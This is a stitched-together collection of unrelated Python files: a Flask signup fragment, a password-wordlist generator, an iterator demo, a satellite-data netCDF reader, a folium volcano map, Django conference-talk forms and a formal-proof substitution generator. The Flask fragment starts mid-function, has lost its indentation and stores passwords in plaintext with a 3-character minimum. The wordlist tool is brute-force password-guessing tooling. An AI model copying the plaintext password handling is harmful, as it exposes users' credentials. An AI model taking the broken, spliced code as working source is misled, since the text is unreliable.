def register_validation():
username = ''
password = ''
password2 = ''
valid=True
username_error=''
password_error=''
password2_error=''
if request.method == 'POST':
username = request.form['username']
password = request.form['password']
password2 = request.form['password2']
existing_user = Users.query.filter_by(username=username).first()
if username=='':
username_error='Select a username'
valid=False
if len(password) >20 or len(password) <3:
password_error='Password must be between 3 and 20 characters'
valid=False
if password2!=password or password2=='':
password2_error='Password does not match'
valid=False
if valid is False:
return render_template('signup.html', username_error=username_error, password_error=password_error, password2_error=password2_error)
if not existing_user:
signup = Users(username, password)
db.session.add(signup)
db.session.commit()
session['username'] = username
return redirect('/')
@app.route('/register', methods=['POST', 'GET'])
def register():
    """Render the account-creation form."""
    return render_template('/signup.html')
@app.route('/posts', methods=['POST', 'GET'])
def posts():
    """List every blog post, newest first."""
    newest_first = reversed(Bloggz.query.all())
    return render_template('blog.html', posts=newest_first)
@app.route('/', methods=['POST', 'GET'])
def index():
    """Front page: list all registered users."""
    all_users = Users.query.all()
    return render_template('index.html', users=all_users)
if __name__ == '__main__':
    # Development entry point.  (A stray '|' extraction artifact was
    # removed from the end of the app.run() line.)
    app.run()
import sys
import getopt
import string
from itertools import product
# ANSI escape codes used to colour error messages in the terminal.
EXCEPTION_COLOR = '\033[91m'
END_COLOR = '\x1b[0m'
# Module-level settings; gen_wordlist() mutates these from the CLI args.
save_to_file = False
filename = ""
min_len = 0
max_len = 0
# Default alphabet: ASCII letters, digits and punctuation.
char_set = string.ascii_letters + string.digits + string.punctuation
# Text printed for -h/--help or when no arguments are given.
help_text = """wordlist-generator 0.1 ( https://github.com/nicolai-h/wordlist-generator )
USAGE:
wordlist-generator -s <min_len> -l <max_len> [options]
OPTIONS:
-s, --shortest: specify minimum length of generated words
-l, --longest: specify maximum length of generated words
-c, --character-set: specify the character set used for generating the words
-o, --output: specify the file where the generated words should be stored
-h, --help: get help info
DEFAULTS:
minimum length: 0
maximum length: 0
character set: 0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!"#$%&'()*+,-./:;<=>?@[\]^_`{|}~
output: by default the generated words will be printed out to the terminal
EXAMPLE USAGE:
python3 wordlist_gen.py -s 2 -l 4 -c abcd -o test.txt
"""
def gen_wordlist(argv):
    """Parse the command-line arguments into the module-level settings.

    Prints the help text and exits when called with no arguments, with
    -h/--help, or when an option fails to parse.
    """
    global save_to_file
    global filename
    global min_len
    global max_len
    global char_set
    global help_text
    if not argv:
        print(help_text)
        sys.exit()
    try:
        opts, args = getopt.getopt(
            argv, "s:l:c:o:h",
            ["shortest=", "longest=", "character-set=", "output=", "help"])
    except getopt.GetoptError:
        print(EXCEPTION_COLOR + "generate_wordlist --shortest <min_len> --longest <max_len> --character-set <char_set> --output <output_file>" + END_COLOR)
        sys.exit()
    for opt, arg in opts:
        if opt in ("-h", "--help"):
            print(help_text)
            sys.exit()
        elif opt in ("-o", "--output"):
            # An output file was requested; remember where to write.
            save_to_file = True
            filename = arg
        elif opt in ("-c", "--character-set"):
            char_set = arg
        elif opt in ("-s", "--shortest"):
            try:
                min_len = int(arg)
            except ValueError:
                print(EXCEPTION_COLOR + "minimum length needs to be a number" + END_COLOR)
                sys.exit()
        elif opt in ("-l", "--longest"):
            try:
                max_len = int(arg)
            except ValueError:
                print(EXCEPTION_COLOR + "maximum length needs to be a number" + END_COLOR)
                sys.exit()
def create_wordlist():
    """Emit every word of length min_len..max_len over char_set.

    Writes one word per line, either to `filename` (when --output was
    given) or to stdout.  Improvements: the unused `diff_len` local was
    removed and the duplicated generation loop was factored into a single
    generator shared by both output paths.
    """
    def _words():
        # Cartesian products of increasing length, shortest words first.
        for length in range(min_len, max_len + 1):
            for combo in product(char_set, repeat=length):
                yield ''.join(combo)

    if save_to_file:
        with open(filename, 'w') as f:
            for word in _words():
                f.write(word + '\n')
    else:
        for word in _words():
            print(word)
if __name__ == "__main__":
gen_wordlist(sys.argv[1:])
create_wordlist()
|
# encoding =utf-8 #
class Countdown:
    """Iterable that counts start..1 forwards and 1..start in reverse.

    Implementing __reversed__ lets reversed(Countdown(n)) count upward
    lazily, without materialising the sequence.
    """

    def __init__(self, start):
        # Highest value produced by forward iteration.
        self.start = start

    def __iter__(self):
        # Yield start, start-1, ..., 1.
        current = self.start
        while current > 0:
            yield current
            current -= 1

    def __reversed__(self):
        # Yield 1, 2, ..., start.
        for value in range(1, self.start + 1):
            yield value
# Demo: prints 1..10 using the reverse iteration protocol.
if __name__ == '__main__':
    for rr in reversed(Countdown(10)):
        print(rr)
|
# Copyright (c) 2015,Vienna University of Technology,
# Department of Geodesy and Geoinformation
# All rights reserved.
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL VIENNA UNIVERSITY OF TECHNOLOGY,
# DEPARTMENT OF GEODESY AND GEOINFORMATION BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
'''
Module contains the Class for reading ESA CCI data in netCDF Format
Created on Fri Mar 27 15:12:18 2015
@author: Christoph.Paulik@geo.tuwien.ac.at
'''
import netCDF4 as nc
import numpy as np
import os
import pygeogrids.grids as grids
class ESACCI_grid(grids.BasicGrid):
    """
    ESA CCI grid class

    Attributes
    ----------
    land_ind: numpy.ndarray
        indices of the land points
    """

    def __init__(self, lsmaskfile=None):
        # Fall back to the land/sea mask shipped with the package.
        if lsmaskfile is None:
            lsmaskfile = os.path.join(os.path.dirname(__file__), "..", "bin",
                                      "esa-cci",
                                      "ESACCI-SOILMOISTURE-LANDMASK_V0.4.nc")
        with nc.Dataset(lsmaskfile) as ls:
            # flip along the latitude axis to fit together with the images
            # from the CCI data. This inconsistency was already reported to
            # the CCI team.
            land_mask = ls.variables['land'][::-1, :].data == 1
            # Global point indices (row-major) of all land cells.
            self.land_ind = np.arange(land_mask.size)[land_mask.ravel()]
            longrid, latgrid = np.meshgrid(ls.variables['lon'][:],
                                           ls.variables['lat'][::-1])
        super(ESACCI_grid, self).__init__(longrid.flatten(),
                                          latgrid.flatten(),
                                          subset=self.land_ind,
                                          shape=(1440, 720))
class ESACCI_netcdf(object):
    """
    Class for reading ESA CCI data from netCDF files

    Caches the following:
    - time variable
    - keeps the dataset open as long as the instance exists
    """

    def __init__(self, fname, variables=None, avg_var=None, time_var='time',
                 lat_var='lat', lon_var='lon'):
        """
        Parameters
        ----------
        fname: string
            filename
        variables: list, optional
            if given only these variables will be read
        avg_var: list, optional
            list of variables for which to calculate the average if not given
            it is calculated for all variables
        time_var: string, optional
            name of the time variable in the netCDF file
        lat_var: string, optional
            name of the latitude variable in the netCDF file
        lon_var: string, optional
            name of the longitude variable in the netCDF file
        """
        self.fname = fname
        self.ds = nc.Dataset(fname)
        self.lat_var = lat_var
        self.lon_var = lon_var
        self.time_var = time_var
        self.avg_var = avg_var
        if variables is None:
            # Bug fix: on Python 3 ``.keys()`` returns a view object that
            # has no ``.remove()``, so the original code raised
            # AttributeError.  Materialising into a list works on both
            # Python 2 and 3.
            self.variables = list(self.ds.variables.keys())
            # exclude time, lat and lon from variable list
            self.variables.remove(self.time_var)
            self.variables.remove(self.lat_var)
            self.variables.remove(self.lon_var)
        else:
            self.variables = variables
        self._init_grid()

    def _init_grid(self):
        """
        initialize the grid of the dataset
        """
        self.grid = ESACCI_grid()

    def get_timeseries(self, locationid, date_start=None, date_end=None):
        """
        Read the time series of all configured variables at one grid point.

        Parameters
        ----------
        locationid: int
            location id as lat_index * row_length + lon_index
        date_start: datetime, optional
            start date of the time series
        date_end: datetime, optional
            end date of the time series

        Returns
        -------
        ts : dict
            variable name -> array over the selected time span
        """
        # NOTE(review): nc.netcdftime.date2index belongs to an older
        # netCDF4 layout; newer versions expose date2index at the module
        # top level -- confirm against the pinned netCDF4 version.
        start_index, end_index = None, None
        if date_start is not None:
            start_index = nc.netcdftime.date2index(
                date_start, self.ds.variables[self.time_var])
        if date_end is not None:
            end_index = nc.netcdftime.date2index(
                date_end, self.ds.variables[self.time_var])
        date_slice = slice(start_index, end_index, None)
        # get row, column from location id
        row, col = self.grid.gpi2rowcol(locationid)
        ts = {}
        for v in self.variables:
            ts[v] = self.ds.variables[v][date_slice, row, col]
        return ts

    def get_avg_image(self, date_start, date_end=None, cellID=None):
        """
        Reads image from dataset, takes the average if more than one value
        is in the result array.

        Parameters
        ----------
        date_start: datetime
            start date of the image to get. If only one date is given then
            the whole day of this date is read
        date_end: datetime, optional
            end date of the averaged image to get
        cellID: int, optional
            cell id to which the image should be limited, for ESA CCI this
            is not defined at the moment.
        """
        if date_end is None:
            date_end = date_start
        img = self.get_data(date_start, date_end)
        # Average over the time axis.  When avg_var is None every variable
        # is averaged, otherwise only the variables listed in avg_var.
        for v in img:
            if self.avg_var is not None:
                if v in self.avg_var:
                    img[v] = img[v].mean(axis=0)
            else:
                img[v] = img[v].mean(axis=0)
        return img

    def get_data(self, date_start, date_end, cellID=1):
        """
        Reads date cube from dataset

        Parameters
        ----------
        date_start: datetime
            start date of the image to get. If only one date is given then
            the whole day of this date is read
        date_end: datetime
            end date of the averaged image to get
        cellID: int
            cell id to which the image should be limited, for ESA CCI this
            is not defined at the moment.
        """
        start_index = nc.netcdftime.date2index(
            date_start, self.ds.variables[self.time_var])
        end_index = nc.netcdftime.date2index(
            date_end, self.ds.variables[self.time_var])
        # end index is inclusive here, hence the +1
        date_slice = slice(start_index, end_index + 1, None)
        img = {}
        for v in self.variables:
            img[v] = self.ds.variables[v][date_slice, :, :]
        return img
|
import folium
import pandas
# Load the volcano catalogue; the columns used below are LAT, LON and ELEV.
data = pandas.read_csv("Volcanoes_USA.txt")
lat = list(data["LAT"])
lon = list(data["LON"])
elev = list(data["ELEV"])
def color_producer(elevation):
    """Map an elevation (metres) to a marker colour.

    <= 1500 -> "pink"; 1500 < e <= 3000 -> "purple"; above 3000 -> "blue".
    """
    if elevation <= 1500:
        return "pink"
    return "purple" if elevation <= 3000 else "blue"
# NOTE(review): `map` shadows the builtin of the same name; harmless in a
# short script but worth renaming if this grows.
map = folium.Map(location=[38.01, -99.09], zoom_start=6, tiles="Mapbox Bright")
fgv = folium.FeatureGroup(name="Volcanoes")
# for lt, ln, el in zip(lat, lon, elev):
#     fg.add_child(folium.Marker(location=[lt, ln], popup=str(el) + " m", icon=folium.Icon(color=color_producer(el))))
# One circle per volcano, radius scaled by elevation, colour from
# color_producer().
for lt, ln, el in zip(lat, lon, elev):
    fgv.add_child(folium.CircleMarker(location=[lt, ln], radius=el/300, popup=str(el) + " m", fill = True,
                                      fill_color=color_producer(el), color='grey', fill_opacity=0.7))
# Second layer: country borders from a bundled GeoJSON file.
fgp = folium.FeatureGroup(name="Population")
fgp.add_child(folium.GeoJson(open(file='world.json').read()))
map.add_child(fgv)
map.add_child(fgp)
# LayerControl lets the user toggle the two feature groups.
map.add_child(folium.LayerControl())
map.save("Map1.html")
|
# -*- coding: utf-8 -*-
from django import forms
from django.utils.translation import ugettext_lazy as _
from django.conf import settings
from models import Topic, TopicLabel, Language, LanguageLabel, Country, CountryLabel, Transportation, TransportationLabel, Talk, License, LicenseLabel, CaptureLicense
# Dynamic construction of the admin form classes: every generated class
# derives from ModelForm and gains per-language label fields (see below).
bases = (forms.ModelForm,)
def base__init__(self, *args, **keys):
    """
    Feed the form's initial data with existing label values when editing.

    Injected as ``__init__`` into the dynamically built admin form classes
    (see get_attributes); ``self.label_model`` is set on each concrete
    subclass.
    """
    if 'instance' in keys and keys['instance']:
        instance = keys['instance']
        property_dct = {}
        if self.label_model:
            # One extra form field exists per (language, label slot) pair.
            labels = self.label_model.objects.filter(parent=instance)
            for label in labels:
                property_dct['label_%s_%d' % (label.language, label.label_number)] = label.value
        if 'initial' in keys:
            keys['initial'].update(property_dct)
        else:
            keys['initial'] = property_dct
    forms.ModelForm.__init__(self, *args, **keys)
def base_save(self, *args, **keys):
    """
    Save the form, then synchronise the per-language label rows.

    Injected as ``save`` into the dynamically built admin form classes.
    Returns the saved model instance, like ModelForm.save().
    """
    new_obj = forms.ModelForm.save(self, *args, **keys)
    new_obj.save()

    def save_labels(self, label_model, nb_labels, extra_id=''):
        # Bring the label rows in the DB in line with the submitted fields.
        if not label_model:
            return
        labels = label_model.objects.filter(parent=new_obj)
        old_languages = []
        for label in labels:
            if label.label_number >= nb_labels:
                # Stale slot: just delete it.  (Bug fixed: the original
                # called label.save() immediately after label.delete(),
                # which re-inserted the row it had just removed.)
                label.delete()
                continue
            lbl = self.cleaned_data[extra_id + 'label_%s_%d' % (label.language,
                                                                label.label_number)]
            old_languages.append((label.language, label.label_number))
            label.value = lbl
            label.save()
        # Create the labels that do not exist in the database yet.
        for idx in xrange(nb_labels):
            for language_id, language_label in settings.LANGUAGES:
                if (language_id, idx) not in old_languages:
                    lbl = self.cleaned_data[extra_id + 'label_%s_%d' % (language_id, idx)]
                    label_model.objects.create(parent=new_obj, value=lbl,
                                               language=language_id, label_number=idx)
    save_labels(self, self.label_model, self.nb_labels)
    return new_obj
def get_attributes(base_class):
    """Build the attribute dict for a dynamically created admin form class.

    Adds one optional CharField per (label slot, configured language) pair
    plus the shared __init__/save implementations.
    """
    labels = base_class.labels
    atts = {'nb_labels': len(labels)}
    for idx, label_entry in enumerate(labels):
        for language_id, language_label in settings.LANGUAGES:
            field_name = 'label_%s_%d' % (language_id, idx)
            atts[field_name] = forms.CharField(
                label=label_entry[1] + u" (%s)" % language_label,
                widget=forms.TextInput, required=False, max_length=256)
    atts['__init__'] = base__init__
    atts['save'] = base_save
    return atts
# Each admin form base class is built by calling ModelForm's metaclass
# (falling back to plain ``type``) directly, so the per-language label
# CharFields returned by get_attributes() become real form fields.
TopicAdminFormBase = getattr(forms.ModelForm, '__metaclass__', type) \
    ('TopicAdminFormBase', bases, get_attributes(Topic))


class TopicAdminForm(TopicAdminFormBase):
    # Label storage model used by base__init__ / base_save.
    label_model = TopicLabel

    class Meta:
        model = Topic


LanguageAdminFormBase = getattr(forms.ModelForm, '__metaclass__', type) \
    ('LanguageAdminFormBase', bases, get_attributes(Language))


class LanguageAdminForm(LanguageAdminFormBase):
    label_model = LanguageLabel

    class Meta:
        model = Language


CountryAdminFormBase = getattr(forms.ModelForm, '__metaclass__', type) \
    ('CountryAdminFormBase', bases, get_attributes(Country))


class CountryAdminForm(CountryAdminFormBase):
    label_model = CountryLabel

    class Meta:
        model = Country


LicenseAdminFormBase = getattr(forms.ModelForm, '__metaclass__', type) \
    ('LicenseAdminFormBase', bases, get_attributes(License))


class LicenseAdminForm(LicenseAdminFormBase):
    label_model = LicenseLabel

    class Meta:
        model = License


TransportationAdminFormBase = getattr(forms.ModelForm, '__metaclass__', type) \
    ('TransportationAdminFormBase', bases, get_attributes(Transportation))


class TransportationAdminForm(TransportationAdminFormBase):
    label_model = TransportationLabel

    class Meta:
        model = Transportation
# Ugly hack
from django.forms import widgets
from django.utils.encoding import force_unicode
from itertools import chain
from operator import itemgetter
class SortedForm(widgets.Select):
    """Select widget that renders its options sorted by label text."""

    def render_options(self, choices, selected_choices):
        # Normalize selected values to strings for comparison.
        selected_choices = set(force_unicode(v) for v in selected_choices)
        # Merge configured and extra choices, then order them by label.
        ordered = sorted(chain(self.choices, choices), key=itemgetter(1))
        rendered = [self.render_option(selected_choices, value, label)
                    for value, label in ordered]
        return u'\n'.join(rendered)
# Shared HTML attributes for single-line text inputs and textareas below.
_iattrs = {'class': 'text', 'size': 60}
_tattrs = {'cols': '60', 'rows': '8'}
class TalkForm(forms.ModelForm):
    """Public call-for-papers submission form for a Talk.

    Declares explicit fields (with translatable labels/help texts) on top
    of the Talk model and cross-validates dependent fields in clean().
    """
    # NOTE(review): Language.objects.get(code='en') runs a DB query at
    # import time and raises if the row is missing -- confirm fixtures
    # guarantee an 'en' language before the module is imported.
    language = forms.ModelChoiceField(label=_(u"Language"),
            queryset=Language.objects.all(), empty_label=None,
            initial=Language.objects.get(code='en'))
    topic = forms.ModelChoiceField(label=_(u"Topic"),
            queryset=Topic.objects.all(), empty_label=None, widget=SortedForm)
    title = forms.CharField(
            label=_(u"Title"),
            min_length=5, widget=forms.TextInput(attrs=_iattrs))
    translated_title = forms.CharField(
            label=_(u"Title in French (or Dutch)"),
            required=False,
            widget=forms.TextInput(attrs=_iattrs))
    nature = forms.ChoiceField(
            label=_(u"Type"), choices=Talk.NATURES, required=True)
    abstract = forms.CharField(
            label=_(u"Summary"),
            widget=forms.Textarea(attrs=_tattrs),
            help_text=_(u"A description of what the talk would be about. This abstract will be published on the website."),
            )
    translated_abstract = forms.CharField(
            label=_(u"Summary in French (or Dutch)"),
            widget=forms.Textarea(attrs=_tattrs),
            help_text=_(u"If you can write an abstract in French, please do so."),
            required=False,
            )
    slides_language = forms.ModelChoiceField(label=_(u"Slides Language"),
            queryset=Language.objects.all(), empty_label=None,
            initial=Language.objects.get(code='en'))
    license = forms.ModelChoiceField(
            label=_(u"License"), required=False,
            queryset=License.objects.order_by('order'),
            help_text=_(u"The preferred license for your support files (contact us if you would like us to add another license)."),
            )
    capture = forms.ChoiceField(
            label=_(u"Capture"), choices=Talk.YES_NO, required=False,
            help_text=_(u"Choose “yes” if the speaker(s) agree for the talk to be captured (audio and/or video) and published on the event website (and probably spread on the whole Internet)."),
            )
    capture_license = forms.ChoiceField(
            label=_(u"Capture License"), choices=Talk.CAPTURE_LIC,
            required=False,
            help_text=_(u"The preferred license for the capture of the talk (contact us if you would like us to add another license)."),
            initial="cc-by-sa",
            )
    constraints = forms.CharField(label=_(u"Constraints"),
            widget=forms.Textarea(attrs=_tattrs), required=False,
            help_text=_(u"If the speaker(s) have special needs, constraints (be scheduled on a specific date, disabled person moving with a wheelchair, etc) or something else."),
            )
    # Target-audience checkboxes.
    for_general_public = forms.BooleanField(label=_(u"General public"), required=False)
    for_professionals = forms.BooleanField(label=_(u"Professionals"), required=False)
    for_decision_makers = forms.BooleanField(label=_(u"Decision makers"), required=False)
    for_geeks = forms.BooleanField(label=_(u"Geeks"), required=False)
    # Conference "fil rouge" (theme track) checkboxes.
    fil_rouge_auquotidien = forms.BooleanField(label=_(u"Freedom in Everyday Life"), required=False)
    fil_rouge_2 = forms.BooleanField(label=_(u"Societal Challenges"), required=False)
    fil_rouge_3 = forms.BooleanField(label=_(u"Open Data"), required=False)
    fil_rouge_4 = forms.BooleanField(label=_(u"Cloud"), required=False)
    speakers = forms.CharField(label=_(u"Speaker(s)"), widget=forms.Textarea(attrs=_tattrs),
            help_text=_(u"First name, last name, email of the speaker(s). One speaker per line. Each line should respect the following format: « Firstname Lastname [speaker@domain.tld] »"),
            )
    biography = forms.CharField(label=_(u"Biography"), widget=forms.Textarea(attrs=_tattrs),
            help_text=_(u"Add a few words about the speaker(s). Their, work, activities, involvement in free software, etc. It will be published with the abstract on the event website."),
            )
    translated_biography = forms.CharField(label=_(u"Biography in French"), widget=forms.Textarea(attrs=_tattrs),
            help_text=_(u"Same but in French. If you don't know French, don't worry, we'll handle this for you."),
            required=False,
            )
    charges = forms.ChoiceField(label=(_(u"Refund charges")),
            choices=Talk.NO_YES_MAYBE, required=False)
    transportation = forms.ModelChoiceField(label=_(u"Transportation"),
            queryset=Transportation.objects.all(), required=False)
    city = forms.CharField(label=_(u"City"), min_length=3,
            required=False, widget=forms.TextInput(attrs=_iattrs))
    country = forms.ModelChoiceField(label=_(u"Country"), widget=SortedForm,
            required=False, queryset=Country.objects.all())
    cost = forms.CharField(label=_(u"Estimated cost (euros)"),
            required=False, widget=forms.TextInput(attrs=_iattrs),
            help_text=_(u"If you know the estimated cost of the transportation, it will be easier for us to have a clear view of the expenses we could engage."),
            )

    class Meta:
        model = Talk
        exclude = ('status', 'notes')

    def clean(self):
        """Cross-field validation for fields that depend on each other."""
        cleaned_data = self.cleaned_data
        capture = cleaned_data.get('capture')
        license = cleaned_data.get('license')
        charges = cleaned_data.get('charges')
        city = cleaned_data.get('city')
        country = cleaned_data.get('country')
        speakers = cleaned_data.get('speakers')
        # Agreeing to capture ('1' == yes) requires a capture license.
        if capture == '1' and license == None:
            self._errors['license'] = self.error_class([_(u"This field is required.")])
            del cleaned_data['license']
        # Asking (or maybe asking) for a refund requires travel details.
        if charges != '0':
            if city == '':
                self._errors['city'] = self.error_class([_(u"This field is required.")])
                del cleaned_data['city']
            if country == None:
                self._errors['country'] = self.error_class([_(u"This field is required.")])
                del cleaned_data['country']
        if speakers != None:
            if speakers.strip() == '':
                self._errors['speakers'] = self.error_class([_(u"This field is required.")])
            else:
                # Each line must match Talk.speaker_re():
                # « Firstname Lastname [speaker@domain.tld] »
                speaker_re = Talk.speaker_re()
                speakers = speakers.strip()
                errors = []
                success = []
                for s in speakers.split("\n"):
                    s = s.strip()
                    if speaker_re.match(s) == None:
                        errors.append(s)
                    else:
                        success.append(s)
                if errors != []:
                    # reverse/append/reverse prepends the header message
                    # while keeping the offending lines in original order.
                    errors.reverse()
                    errors.append(_(u"The following lines don't match the correct format:"))
                    errors.reverse()
                    self._errors['speakers'] = self.error_class(errors)
                    del cleaned_data['speakers']
        return cleaned_data
class TalkAdminForm(TalkForm):
    """Admin variant of TalkForm that also exposes the internal notes."""
    notes = forms.CharField(label=_(u"Notes"),
            required=False, widget=forms.Textarea(attrs=_tattrs))

    class Meta:
        # NOTE(review): this Meta does not inherit TalkForm.Meta, so no
        # `model` is declared here -- confirm the Django version in use
        # accepts a ModelForm whose Meta omits the model attribute.
        exclude = ()
|
from typing import Union, Tuple
from ml.kore import ast as kore
from ml.kore.utils import KoreUtils
from ml.metamath import ast as mm
from ml.metamath.composer import Proof, Theorem
from .encoder import KorePatternEncoder
from .env import ProofEnvironment, ProofGenerator
"""
Given a kore pattern phi, pattern psi, and variable x, generate a proof for
#Substitution phi[psi/x] phi psi x
where phi[psi/x] is the actual pattern with x substituted with phi,
with the assumption that distinct meta #Variable varible are disjoint
This also support substituting sort variables
"""
class SingleSubstitutionProofGenerator(ProofGenerator, kore.KoreVisitor):
    """Visitor that proves ``#Substitution phi[psi/x] phi psi x`` claims.

    Walks a kore pattern or sort and, for each construct, applies the
    matching substitution axiom/theorem from the proof environment.
    Supports substituting both pattern variables and sort variables.
    """

    def __init__(self, env: ProofEnvironment, var: Union[kore.Variable, kore.SortVariable], substitute: Union[kore.Pattern, kore.Sort]):
        super().__init__(env)
        self.var = var
        self.substitute = substitute
        self.var_encoded = self.env.encode_pattern(var)
        self.substitute_encoded = self.env.encode_pattern(substitute)

        # get a "template" for the target statement
        # for convenience
        tmp1, tmp2 = self.env.gen_metavariables("#Pattern", 2)
        self.target = mm.StructuredStatement(
            mm.Statement.PROVABLE,
            [
                mm.Application("#Substitution"),
                mm.Metavariable(tmp1),
                mm.Metavariable(tmp2),
                self.substitute_encoded,
                self.var_encoded,
            ]
        )

    def visit_and_substitute(self, pattern_or_sort: Union[kore.Pattern, kore.Sort]) -> Tuple[Proof, Union[kore.Pattern, kore.Sort]]:
        """
        Additional to the proof, also return the actual substituted
        pattern/sort.
        """
        proof = super().visit(pattern_or_sort)
        if isinstance(pattern_or_sort, kore.Pattern):
            substituted = KoreUtils.copy_and_substitute_pattern(pattern_or_sort, { self.var: self.substitute })
        else:
            substituted = KoreUtils.copy_and_substitute_sort(pattern_or_sort, { self.var: self.substitute })
        return proof, substituted

    def postvisit_axiom(self, axiom: kore.Axiom) -> Proof:
        # prove substitution of the pattern
        # \kore-forall-sort S1 ... \kore-forall-sort Sn \kore-valid ph0 ph1
        pattern_sort = KoreUtils.infer_sort(axiom.pattern)
        pattern_subst_proof = self.visit(axiom.pattern)
        sort_subst_proof = self.visit(pattern_sort)
        proof = self.env.get_theorem("substitution-kore-valid").apply(
            sort_subst_proof,
            pattern_subst_proof,
        )

        # Quantifiers at index >= shadowed_index shadow the substituted
        # variable; default (no shadowing) is past the last quantifier.
        shadowed_index = len(axiom.sort_variables)
        if isinstance(self.var, kore.SortVariable):
            # try to locate the position of the quantifier
            # which coincides with the substitution variables
            for i, sort_var in enumerate(axiom.sort_variables):
                if sort_var == self.var:
                    shadowed_index = i
                    break

        if shadowed_index < len(axiom.sort_variables):
            # Re-wrap the quantifiers inside the shadowing one manually,
            # then apply the shadowed-substitution theorem at that level.
            body = proof.statement.terms[1]
            for sort_var in axiom.sort_variables[shadowed_index + 1:][::-1]:
                encoded_sort_var = KorePatternEncoder.encode_sort_variable(sort_var)
                body = mm.Application(
                    KorePatternEncoder.FORALL_SORT,
                    [
                        mm.Metavariable(encoded_sort_var),
                        body,
                    ],
                )
            proof = self.env.get_theorem("substitution-kore-forall-sort-shadowed").apply(
                x=self.var_encoded,
                ph0=body,
                ph1=self.substitute_encoded,
            )

        # wrap the rest of forall-sort quantifiers
        for sort_var in axiom.sort_variables[:shadowed_index][::-1]:
            encoded_sort_var = KorePatternEncoder.encode_sort_variable(sort_var)
            proof = self.env.get_theorem("substitution-kore-forall-sort").apply(
                proof,
                x=mm.Metavariable(encoded_sort_var)
            )
        return proof

    def postvisit_sort_instance(self, sort_instance: kore.SortInstance) -> Proof:
        # Apply the per-sort substitution axiom to the argument subproofs.
        symbol = KorePatternEncoder.encode_sort(sort_instance)
        return self.env.substitution_axioms[symbol].match_and_apply(
            self.target,
            *[ self.visit(arg) for arg in sort_instance.arguments ],
        )

    def postvisit_sort_variable(self, sort_variable: kore.SortVariable) -> Proof:
        # Base case: the variable itself, or a distinct variable.
        if sort_variable.name == self.var.name:
            return self.env.get_theorem("substitution-var-same").apply(
                ph0=self.substitute_encoded,
                xX=self.var_encoded
            )
        else:
            return self.env.get_theorem("substitution-var-diff").apply(
                yY=self.env.encode_pattern(sort_variable),
                ph0=self.substitute_encoded,
                xX=self.var_encoded,
            )

    def postvisit_variable(self, var: kore.Variable) -> Proof:
        # Same base case as sort variables, for pattern variables.
        if var.name == self.var.name:
            return self.env.get_theorem("substitution-var-same").apply(
                ph0=self.substitute_encoded,
                xX=self.var_encoded
            )
        else:
            return self.env.get_theorem("substitution-var-diff").apply(
                yY=self.env.encode_pattern(var),
                ph0=self.substitute_encoded,
                xX=self.var_encoded,
            )

    def postvisit_string_literal(self, literal: kore.StringLiteral) -> Proof:
        # String literals contain no variables; the axiom closes the goal.
        symbol = KorePatternEncoder.encode_string_literal(literal)
        return self.env.substitution_axioms[symbol].match_and_apply(self.target)

    def postvisit_application(self, application: kore.Application) -> Proof:
        # Substitute through the sort arguments first, then the arguments.
        symbol = KorePatternEncoder.encode_symbol(application.symbol)
        return self.env.substitution_axioms[symbol].match_and_apply(
            self.target,
            *[ self.visit(arg) for arg in application.symbol.sort_arguments + application.arguments ],
        )

    def postvisit_ml_pattern(self, ml_pattern: kore.MLPattern) -> Proof:
        # Non-binding constructs dispatch to a theorem by construct name.
        substitution_axiom_map = {
            kore.MLPattern.TOP: "substitution-kore-top",
            kore.MLPattern.BOTTOM: "substitution-kore-bottom",
            kore.MLPattern.NOT: "substitution-kore-not",
            kore.MLPattern.AND: "substitution-kore-and",
            kore.MLPattern.OR: "substitution-kore-or",
            kore.MLPattern.CEIL: "substitution-kore-ceil",
            kore.MLPattern.FLOOR: "substitution-kore-floor",
            kore.MLPattern.EQUALS: "substitution-kore-equals",
            kore.MLPattern.IN: "substitution-kore-in",
            kore.MLPattern.REWRITES: "substitution-kore-rewrites",
            kore.MLPattern.REWRITES_STAR: "substitution-kore-rewrites-star",
            kore.MLPattern.DV: "substitution-kore-dv",
            kore.MLPattern.IMPLIES: "substitution-kore-implies",
        }

        if ml_pattern.construct in substitution_axiom_map:
            return self.env.get_theorem(substitution_axiom_map[ml_pattern.construct]).apply(
                *[ self.visit(arg) for arg in ml_pattern.sorts + ml_pattern.arguments ],
            )
        elif ml_pattern.construct in { kore.MLPattern.FORALL, kore.MLPattern.EXISTS }:
            # Binders need shadowing treatment, like axiom sort quantifiers.
            binding_var = ml_pattern.get_binding_variable()
            body = ml_pattern.arguments[1]
            body_sort = ml_pattern.sorts[0]

            if binding_var == self.var:
                theorem_name = "substitution-kore-forall-shadowed" if ml_pattern.construct == kore.MLPattern.FORALL else \
                               "substitution-kore-exists-shadowed"
                # var_sort_subproof = self.visit(binding_var.sort)
                # body_sort_subproof = self.visit(body_sort)
                # shadowed
                return self.env.get_theorem(theorem_name).apply(
                    # var_sort_subproof,
                    # body_sort_subproof,
                    ph2=self.env.encode_pattern(body),
                )
            else:
                theorem_name = "substitution-kore-forall" if ml_pattern.construct == kore.MLPattern.FORALL else \
                               "substitution-kore-exists"
                var_sort_subproof = self.visit(binding_var.sort)
                # body_sort_subproof = self.visit(body_sort)
                body_subproof = self.visit(body)
                encoded_body_sort = self.env.encode_pattern(body_sort)
                return self.env.get_theorem(theorem_name).apply(
                    var_sort_subproof,
                    # body_sort_subproof,
                    body_subproof,
                    ph1=encoded_body_sort,
                    ph4=encoded_body_sort,
                    y=self.env.encode_pattern(binding_var), # still need to specify the binding variable
                )
        else:
            raise Exception("unsupported construct {}".format(ml_pattern))
|
from json import loads, dumps
